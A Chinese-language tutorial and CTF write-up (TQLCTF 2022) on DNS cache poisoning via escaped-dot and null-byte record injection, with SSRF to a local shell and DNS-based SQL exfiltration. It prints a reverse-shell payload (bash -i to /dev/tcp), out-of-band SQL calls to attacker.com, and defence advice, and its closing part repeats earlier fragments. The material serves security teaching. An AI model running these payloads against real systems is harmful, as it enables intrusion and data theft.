DNS缓存攻击与DNS隧道技术详解<\/h1>

一、DNS基础与解析机制<\/h2>

1.1 DNS基本概念<\/h3>
DNS（域名系统）是因特网中的核心服务，用于实现域名和IP地址相互映射的分布式数据库。通过主机名获取对应IP地址的过程称为域名解析。<\/p>

1.2 DNS解析流程<\/h3>

用户端向DNS服务器发送查询请求<\/li>
请求经过网络节点设备（路由器、交换机、网关等）<\/li>
DNS服务器返回解析结果<\/li>

用户端接收第一个到达的响应作为最终结果<\/li> <\/ol>

重要原则<\/strong>：DNS解析机制"只认第一"，即优先采用最先到达的响应。<\/p>

二、DNS缓存攻击原理<\/h2>
2.1 攻击原理概述<\/h3>
攻击者在DNS资源记录中插入控制字符或特殊字符，影响DNS解析结果，实现：<\/p>

DNS缓存污染<\/li>
SQL注入<\/li>
XSS攻击等<\/li> <\/ul>
2.2 攻击场景模拟<\/h3>
假设：<\/p>

A：用户端<\/li>
B：DNS服务器<\/li>
C：中间网络节点<\/li> <\/ul>
攻击过程：<\/p>

A向B发送DNS查询请求<\/li>
C截获请求并分析特征（DNS端口、特定域名、记录类型）<\/li>
C抢先返回伪造的解析结果<\/li>
A接收C的响应作为最终结果<\/li> <\/ol>
三、DNS缓存投毒技术<\/h2>
3.1 句点注入（\.）<\/h3>
原理<\/strong>：\\.<\/code>在解码时被当作.<\/code>字符<\/p>
示例记录：<\/p>
www\\.example.com. A 1.1.1.1 <\/code><\/pre> 存入缓存后实际将www.example.com<\/code>解析为1.1.1.1<\/code><\/p> 利用方式<\/strong>：<\/p> 攻击者拥有特殊域名www\\.example.com<\/code><\/li> 使用CNAME记录重定向<\/li> <\/ol> 示例：<\/p> inject.attacker.com. CNAME www\\.example.com. www\\.example.com. A 1.1.1.1 <\/code><\/pre> 3.2 零字节截断（\000）<\/h3> 原理<\/strong>：\\000<\/code>是C语言字符串结束符，会导致字符串截断<\/p> 示例记录：<\/p> inject.attacker.com. CNAME www.example.com\\000.attacker.com www.example.com\\000.attacker.com A 1.1.1.1 <\/code><\/pre> 解码后缓存www.example.com<\/code>到1.1.1.1<\/code>的映射<\/p> 四、DNS隧道与SSRF攻击实践<\/h2> 4.1 例题分析 - [TQLCTF 2022]Network tools<\/h3> 漏洞点<\/strong>：<\/p> FTP SSRF（ftpcheck<\/code>路由）<\/li> 本地访问限制的shell（shellcheck<\/code>路由）<\/li> <\/ol> 攻击思路<\/strong>：<\/p> 污染token.ftp.testsweb.xyz<\/code>的DNS缓存<\/li> 将其指向攻击者服务器IP<\/li> 实现FTP SSRF访问预留webshell<\/li> <\/ol> 4.2 攻击实施步骤<\/h3> DNS服务器配置<\/strong>（使用Twisted框架）：<\/li> <\/ol> zone =<\/span> [ <\/span><\/span> SOA( <\/span><\/span> 'a.testsweb.xyz'<\/span>, <\/span><\/span> mname=<\/span>"b.testsweb.xyz."<\/span>, <\/span><\/span> rname=<\/span>"admin.a.testsweb.xyz"<\/span>, <\/span><\/span> serial=<\/span>0<\/span>, <\/span><\/span> refresh=<\/span>"1H"<\/span>, <\/span><\/span> retry=<\/span>"30M"<\/span>, <\/span><\/span> expire=<\/span>"1M"<\/span>, <\/span><\/span> minimum=<\/span>"30"<\/span> <\/span><\/span> ), <\/span><\/span> NS('a.testsweb.xyz'<\/span>, 'b.testsweb.xyz'<\/span>), <\/span><\/span> CNAME('ftp.a.testsweb.xyz'<\/span>, 'token.ftp.testsweb.xyz<\/span>\\<\/span>000.a.testsweb.xyz'<\/span>), <\/span><\/span> A('token.ftp.testsweb.xyz<\/span>\\<\/span>000.a.testsweb.xyz'<\/span>, 'X.X.X.X'<\/span>), <\/span><\/span>] <\/span><\/span><\/code><\/pre> 启动DNS服务器<\/strong>：<\/li> <\/ol> sudo service systemd-resolved stop <\/span><\/span>sudo twisted -n dns --pyzone a.testweb.xyz <\/span><\/span><\/code><\/pre> 触发DNS查询<\/strong>：查询ftp.a.testweb.xyz<\/code>使token.ftp.testweb.xyz<\/code>缓存被污染<\/p> <\/li> FTP重定向攻击<\/strong>：<\/p> <\/li> <\/ol> # FTP重定向脚本示例<\/span> <\/span><\/span>import<\/span> socket <\/span><\/span>from<\/span> urllib.parse import<\/span> unquote <\/span><\/span> <\/span><\/span>payload =<\/span> unquote("POST%20\/shellcheck%20HTTP\/1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A<\/span>%20a<\/span>pplication\/x-www-form-urlencoded%0D%0AContent-Length%3A<\/span>%2083%<\/span>0D%0A%0D%0Ashell%3Dbash%2520-c<\/span>%2520%<\/span>2522bash%2520-i<\/span>%2520%<\/span>253E<\/span>%2526%<\/span>2520\/dev\/tcp\/<\/span>{}<\/span>\/<\/span>{}%25200%<\/span>253E<\/span>%25261%<\/span>2522"<\/span>.<\/span>format(shell_ip, shell_port)) <\/span><\/span>payload =<\/span> payload.<\/span>encode('utf-8'<\/span>) <\/span><\/span> <\/span><\/span>host =<\/span> '0.0.0.0'<\/span> <\/span><\/span>port =<\/span> 23<\/span> <\/span><\/span>sk =<\/span> socket.<\/span>socket() <\/span><\/span>sk.<\/span>bind((host, port)) <\/span><\/span>sk.<\/span>listen(5<\/span>) <\/span><\/span><\/code><\/pre>五、数据库系统中的DNS注入<\/h2> 5.1 Microsoft SQL Server注入<\/h3> 利用扩展存储程序<\/strong>：<\/p> master..xp_dirtree<\/code> - 获取文件夹列表 EXEC<\/span> master..xp_dirtree '\\attacker.com\share'<\/span>; <\/span><\/span><\/code><\/pre><\/li> master..xp_fileexist<\/code> - 检查文件存在 EXEC<\/span> master..xp_fileexist '\\attacker.com\file'<\/span>; <\/span><\/span><\/code><\/pre><\/li> master..xp_subdirs<\/code> - 获取子文件夹<\/li> <\/ol> 5.2 Oracle注入技术<\/h3> 可利用函数<\/strong>：<\/p> UTL_INADDR.GET_HOST_ADDRESS<\/code> SELECT<\/span> UTL_INADDR.GET_HOST_ADDRESS('attacker.com'<\/span>); <\/span><\/span><\/code><\/pre><\/li> UTL_HTTP.REQUEST<\/code> SELECT<\/span> UTL_HTTP.REQUEST('http:\/\/attacker.com'<\/span>) FROM<\/span> DUAL; <\/span><\/span><\/code><\/pre><\/li> HTTPURITYPE.GETCLOB<\/code><\/li> DBMS_LDAP.INIT<\/code><\/li> <\/ol> 5.3 MySQL注入技术<\/h3> 利用函数<\/strong>：<\/p> SELECT<\/span> LOAD_FILE('\\\\attacker.com\\file'<\/span>); <\/span><\/span><\/code><\/pre>六、防御措施<\/h2> 6.1 DNS缓存投毒防御<\/h3> 输入验证<\/strong>：<\/p> 对DNS解析结果进行严格过滤<\/li> 处理特殊字符（\\.<\/code>和\\000<\/code>）<\/li> <\/ul> <\/li> 协议增强<\/strong>：<\/p> 使用DNSSEC（DNS安全扩展）<\/li> 实施随机源端口和事务ID<\/li> <\/ul> <\/li> 配置加固<\/strong>：<\/p> 限制递归查询<\/li> 禁用不必要的DNS功能<\/li> <\/ul> <\/li> <\/ol> 6.2 数据库注入防御<\/h3> 权限控制<\/strong>：<\/p> 限制数据库用户权限<\/li> 禁用危险存储过程和函数<\/li> <\/ul> <\/li> 输入过滤<\/strong>：<\/p> 对所有用户输入进行严格验证<\/li> 使用参数化查询<\/li> <\/ul> <\/li> 网络控制<\/strong>：<\/p> 限制数据库外联能力<\/li> 监控异常DNS请求<\/li> <\/ul> <\/li> <\/ol> 七、工具与资源<\/h2> 7.1 常用工具<\/h3> SQLMap<\/strong>：支持DNS渗出技术（需--dns-domain<\/code>参数）<\/li> Twisted<\/strong>：Python网络引擎框架，可用于搭建DNS服务器<\/li> dnscat2<\/strong>：DNS隧道工具<\/li> <\/ol> 7.2 参考资源<\/h3> RFC 1034 - DNS域名标准<\/li> Data Retrieval over DNS in SQL Injection Attacks (arxiv.org)<\/li> OWASP DNS安全指南<\/li> <\/ol>

DNS缓存攻击与DNS隧道技术详解<\/h1>

一、DNS基础与解析机制<\/h2>

1.1 DNS基本概念<\/h3> DNS（域名系统）是因特网中的核心服务，用于实现域名和IP地址相互映射的分布式数据库。通过主机名获取对应IP地址的过程称为域名解析。<\/p>

三、DNS缓存投毒技术<\/h2>

五、数据库系统中的DNS注入<\/h2>

六、防御措施<\/h2>

七、工具与资源<\/h2>

7.2 参考资源<\/h3> RFC 1034 - DNS域名标准<\/li> Data Retrieval over DNS in SQL Injection Attacks (arxiv.org)<\/li> OWASP DNS安全指南<\/li> <\/ol>

1.1 DNS基本概念<\/h3>
DNS（域名系统）是因特网中的核心服务，用于实现域名和IP地址相互映射的分布式数据库。通过主机名获取对应IP地址的过程称为域名解析。<\/p>

7.2 参考资源<\/h3>

RFC 1034 - DNS域名标准<\/li>
Data Retrieval over DNS in SQL Injection Attacks (arxiv.org)<\/li>
OWASP DNS安全指南<\/li> <\/ol>